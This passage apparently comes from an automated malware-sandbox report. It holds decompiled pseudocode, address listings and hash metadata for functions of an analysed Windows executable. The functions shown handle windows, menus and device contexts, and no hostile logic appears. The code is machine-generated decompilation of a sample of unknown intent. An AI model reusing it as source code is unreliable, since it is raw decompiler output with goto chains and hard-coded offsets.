				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00435C00(_t43);
			}










                                                                        0x0043cf3f
                                                                        0x0043cf42
                                                                        0x0043cf52
                                                                        0x0043cf81
                                                                        0x0043cf54
                                                                        0x0043cf54
                                                                        0x0043cf68
                                                                        0x0043cf73
                                                                        0x0043cf74
                                                                        0x0043cf75
                                                                        0x0043cf76
                                                                        0x0043cf76
                                                                        0x0043cf99
                                                                        0x0043cfa9
                                                                        0x0043cfad
                                                                        0x0043cfb1
                                                                        0x0043cfbc
                                                                        0x0043cfbc
                                                                        0x0043cfad
                                                                        0x0043cfc4
                                                                        0x0043cfcb
                                                                        0x0043cfd5
                                                                        0x0043cfe0
                                                                        0x0043cff0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                        • String ID: ,
                                                                        • API String ID: 2266315723-3772416878
                                                                        • Opcode ID: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction ID: 459ab4c7249235b108c54b4c36eddf7638014fb9c7bbac68c80982844e868d89
                                                                        • Opcode Fuzzy Hash: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction Fuzzy Hash: 55117F71504201ABCB01EF6DD8C5A8B77D8AF0D314F04462AFD58EB386D739E9048BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044A3C8, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E0044A3C8(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44a8fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E00449774(E00414208(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x495ad0; // 0x496c04
								E00456E5C( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00414208(_v8, _t368);
									_t295 = _v17;
									_v16 = E004496B8(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00433724( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x495ad0; // 0x496c04
								E00456E5C( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00414208(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E004496B8(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00449FB8(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E00414208(_v8, _t370);
								_t181 = E00449758( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E004496B8(E00414208(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041FDA0(0, 1);
								_push(_t377);
								_push(0x44a72e);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44a711);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E004207B0(_v24,  *(_v40 + 0x18));
								E0042062C(_v24);
								E0044ABA0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44a718);
								__eflags = 0;
								E004207B0(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E004496B8(E00414208(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406FC4();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041FDA0(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E004207B0(_v24, _v32);
									E0042062C(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44a82f, _t377,  *[fs:eax], 0x44a84c, _t377,  *[fs:eax], 0x44a871, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44a836);
									__eflags = 0;
									E004207B0(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00414208(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E004496B8(E00414208(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00414208(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E004496E8(E00414208(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E00414208(_v8, _t373);
											__eflags = 0;
											_t257 = E004496E8(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x495c2c; // 0x496c08
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x495c2c; // 0x496c08
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x495ad0; // 0x496c04
												E00456AF8( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E00456B60();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00406D8C();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44a902);
								return E00404348( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                                                        0x0044a3c9
                                                                        0x0044a3cb
                                                                        0x0044a3d3
                                                                        0x0044a3d6
                                                                        0x0044a3d8
                                                                        0x0044a3dd
                                                                        0x0044a3de
                                                                        0x0044a3e3
                                                                        0x0044a3e6
                                                                        0x0044a3e9
                                                                        0x0044a3eb
                                                                        0x0044a3f0
                                                                        0x0044a412
                                                                        0x0044a412
                                                                        0x0044a417
                                                                        0x0044a466
                                                                        0x0044a467
                                                                        0x0044a469
                                                                        0x00000000
                                                                        0x0044a46f
                                                                        0x0044a46f
                                                                        0x0044a470
                                                                        0x0044a470
                                                                        0x0044a472
                                                                        0x0044a47f
                                                                        0x0044a484
                                                                        0x0044a486
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a48c
                                                                        0x0044a48d
                                                                        0x0044a48d
                                                                        0x0044a48e
                                                                        0x00000000
                                                                        0x0044a490
                                                                        0x00000000
                                                                        0x0044a490
                                                                        0x00000000
                                                                        0x0044a48e
                                                                        0x0044a472
                                                                        0x0044a419
                                                                        0x0044a419
                                                                        0x0044a419
                                                                        0x0044a41c
                                                                        0x0044a495
                                                                        0x0044a499
                                                                        0x0044a49d
                                                                        0x0044a49f
                                                                        0x0044a49f
                                                                        0x0044a4a9
                                                                        0x0044a4aa
                                                                        0x0044a4ac
                                                                        0x0044a522
                                                                        0x0044a522
                                                                        0x0044a52b
                                                                        0x00000000
                                                                        0x0044a4ae
                                                                        0x0044a4ae
                                                                        0x0044a4af
                                                                        0x0044a4af
                                                                        0x0044a4b1
                                                                        0x0044a4b1
                                                                        0x0044a4b5
                                                                        0x0044a4db
                                                                        0x0044a4b7
                                                                        0x0044a4b7
                                                                        0x0044a4ba
                                                                        0x0044a4bc
                                                                        0x0044a4ce
                                                                        0x0044a4be
                                                                        0x0044a4c9
                                                                        0x0044a4c9
                                                                        0x0044a4bc
                                                                        0x0044a4e3
                                                                        0x0044a4e8
                                                                        0x0044a4f3
                                                                        0x0044a4f6
                                                                        0x0044a4fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a51e
                                                                        0x0044a51f
                                                                        0x0044a51f
                                                                        0x0044a520
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a520
                                                                        0x0044a505
                                                                        0x0044a50d
                                                                        0x0044a514
                                                                        0x0044a514
                                                                        0x0044a41e
                                                                        0x0044a41e
                                                                        0x0044a41f
                                                                        0x0044a888
                                                                        0x0044a889
                                                                        0x0044a88b
                                                                        0x00000000
                                                                        0x0044a88d
                                                                        0x0044a88d
                                                                        0x0044a88e
                                                                        0x0044a88e
                                                                        0x0044a890
                                                                        0x0044a89a
                                                                        0x0044a8a2
                                                                        0x0044a8a5
                                                                        0x0044a8a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a8b2
                                                                        0x0044a8b7
                                                                        0x0044a8b9
                                                                        0x0044a8c7
                                                                        0x0044a8c8
                                                                        0x0044a8c8
                                                                        0x0044a8c9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a8b9
                                                                        0x0044a8c0
                                                                        0x0044a8c0
                                                                        0x0044a425
                                                                        0x00000000
                                                                        0x0044a425
                                                                        0x0044a41f
                                                                        0x0044a41c
                                                                        0x00000000
                                                                        0x0044a3f2
                                                                        0x0044a3f2
                                                                        0x0044a430
                                                                        0x0044a431
                                                                        0x0044a433
                                                                        0x00000000
                                                                        0x0044a439
                                                                        0x0044a439
                                                                        0x0044a43a
                                                                        0x0044a43a
                                                                        0x0044a43c
                                                                        0x0044a441
                                                                        0x0044a44a
                                                                        0x0044a44f
                                                                        0x0044a451
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a457
                                                                        0x0044a458
                                                                        0x0044a458
                                                                        0x0044a459
                                                                        0x00000000
                                                                        0x0044a45b
                                                                        0x00000000
                                                                        0x0044a45b
                                                                        0x00000000
                                                                        0x0044a459
                                                                        0x0044a43c
                                                                        0x00000000
                                                                        0x0044a3f4
                                                                        0x0044a3f4
                                                                        0x0044a3f7
                                                                        0x0044a63a
                                                                        0x0044a643
                                                                        0x0044a644
                                                                        0x0044a646
                                                                        0x00000000
                                                                        0x0044a64c
                                                                        0x0044a64c
                                                                        0x0044a64d
                                                                        0x0044a64d
                                                                        0x0044a64f
                                                                        0x0044a666
                                                                        0x0044a669
                                                                        0x0044a66d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a735
                                                                        0x0044a736
                                                                        0x0044a736
                                                                        0x0044a737
                                                                        0x00000000
                                                                        0x0044a73d
                                                                        0x00000000
                                                                        0x0044a73d
                                                                        0x00000000
                                                                        0x0044a737
                                                                        0x0044a67f
                                                                        0x0044a684
                                                                        0x0044a685
                                                                        0x0044a68a
                                                                        0x0044a68d
                                                                        0x0044a69c
                                                                        0x0044a6a1
                                                                        0x0044a6a2
                                                                        0x0044a6a7
                                                                        0x0044a6aa
                                                                        0x0044a6b6
                                                                        0x0044a6cb
                                                                        0x0044a6e4
                                                                        0x0044a6eb
                                                                        0x0044a6ee
                                                                        0x0044a6f1
                                                                        0x0044a6f6
                                                                        0x0044a6fb
                                                                        0x0044a710
                                                                        0x0044a710
                                                                        0x0044a3fd
                                                                        0x0044a3fd
                                                                        0x0044a3fe
                                                                        0x0044a745
                                                                        0x0044a74e
                                                                        0x0044a74f
                                                                        0x0044a751
                                                                        0x00000000
                                                                        0x0044a757
                                                                        0x0044a757
                                                                        0x0044a758
                                                                        0x0044a758
                                                                        0x0044a75a
                                                                        0x0044a771
                                                                        0x0044a774
                                                                        0x0044a778
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a878
                                                                        0x0044a879
                                                                        0x0044a879
                                                                        0x0044a87a
                                                                        0x00000000
                                                                        0x0044a880
                                                                        0x00000000
                                                                        0x0044a880
                                                                        0x00000000
                                                                        0x0044a87a
                                                                        0x0044a781
                                                                        0x0044a785
                                                                        0x0044a78a
                                                                        0x0044a798
                                                                        0x0044a7a7
                                                                        0x0044a7b5
                                                                        0x0044a7c1
                                                                        0x0044a7cf
                                                                        0x0044a7d8
                                                                        0x0044a7ed
                                                                        0x0044a807
                                                                        0x0044a80c
                                                                        0x0044a80f
                                                                        0x0044a812
                                                                        0x0044a817
                                                                        0x0044a81c
                                                                        0x0044a82e
                                                                        0x0044a82e
                                                                        0x0044a404
                                                                        0x0044a407
                                                                        0x0044a538
                                                                        0x0044a541
                                                                        0x0044a542
                                                                        0x0044a544
                                                                        0x00000000
                                                                        0x0044a54a
                                                                        0x0044a54a
                                                                        0x0044a54b
                                                                        0x0044a54b
                                                                        0x0044a54d
                                                                        0x0044a559
                                                                        0x0044a55c
                                                                        0x0044a55f
                                                                        0x0044a562
                                                                        0x0044a58d
                                                                        0x0044a564
                                                                        0x0044a571
                                                                        0x0044a571
                                                                        0x0044a590
                                                                        0x0044a594
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a62a
                                                                        0x0044a62b
                                                                        0x0044a62b
                                                                        0x0044a62c
                                                                        0x00000000
                                                                        0x0044a632
                                                                        0x00000000
                                                                        0x0044a632
                                                                        0x00000000
                                                                        0x0044a62c
                                                                        0x0044a5ac
                                                                        0x0044a5b1
                                                                        0x0044a5b3
                                                                        0x0044a5ba
                                                                        0x0044a5c5
                                                                        0x0044a5c7
                                                                        0x0044a5c7
                                                                        0x0044a5cc
                                                                        0x0044a5d4
                                                                        0x0044a5d7
                                                                        0x0044a5d9
                                                                        0x0044a5df
                                                                        0x0044a5e1
                                                                        0x0044a5e8
                                                                        0x0044a5e8
                                                                        0x0044a5ee
                                                                        0x0044a5f4
                                                                        0x0044a5fb
                                                                        0x0044a617
                                                                        0x0044a620
                                                                        0x0044a5fd
                                                                        0x0044a60d
                                                                        0x0044a60d
                                                                        0x0044a5fb
                                                                        0x0044a5d9
                                                                        0x0044a40d
                                                                        0x0044a8cb
                                                                        0x0044a8ce
                                                                        0x0044a8d2
                                                                        0x0044a8d5
                                                                        0x0044a8d9
                                                                        0x0044a8dc
                                                                        0x0044a8dd
                                                                        0x0044a8e2
                                                                        0x0044a8e2
                                                                        0x0044a8e5
                                                                        0x0044a8e7
                                                                        0x0044a8ea
                                                                        0x0044a8ed
                                                                        0x0044a8fa
                                                                        0x0044a8fa
                                                                        0x0044a3fe
                                                                        0x0044a3f7
                                                                        0x0044a3f2
                                                                        0x00000000

                                                                        APIs
                                                                        • SaveDC.GDI32(?), ref: 0044A697
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A70B
                                                                        • 72E7B080.USER32(?,00000000,0044A8FB), ref: 0044A785
                                                                        • SaveDC.GDI32(?), ref: 0044A7BC
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A829
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044A8FB), ref: 0044A8DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: RestoreSave$B080NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4024241980-0
                                                                        • Opcode ID: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction ID: 70641417114627c6e5c73c337fcbb41be0628d56e5109fcb9be53ed2ef629017
                                                                        • Opcode Fuzzy Hash: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction Fuzzy Hash: 8BE15D34A00609DFEB10EF69C48599EF7F5FF98304B6185AAE805A7321C738ED52CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044FECC, Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E0044FECC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				struct HDC__* _t184;
				intOrPtr* _t207;
				intOrPtr _t232;
				intOrPtr _t238;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				intOrPtr* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t207 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t263 = _t92 - 0x46;
				if(_t263 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037D8(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037D8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t116 = _v8;
						_t232 =  *0x4502fc; // 0x1
						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x4502f8);
						if(_t232 == ( *(_t116 + 0x1c) &  *0x4502f8)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x47aaf4;
							if( *0x47aaf4 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t255 = E0043CC2C(_t138);
												}
											}
										} else {
											_t141 = E0045072C(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t255 = E0043CC2C(E0045072C(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041FDA0(0, 1);
											_push(_t258);
											_push(0x450142);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x450125);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E004207B0(_v16,  *(_v24 + 0x18));
											E0042062C(_v16);
											E0044ABA0(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0x45012c);
											__eflags = 0;
											E004207B0(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t256 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t256 - 1;
									if( *_t256 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t184 = E0043CC2C(_v8);
												L00406FC4();
												_v20 = _t184;
												 *[fs:eax] = _t261;
												_v16 = E0041FDA0(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E004207B0(_v16, _v20);
												E0042062C(_v16);
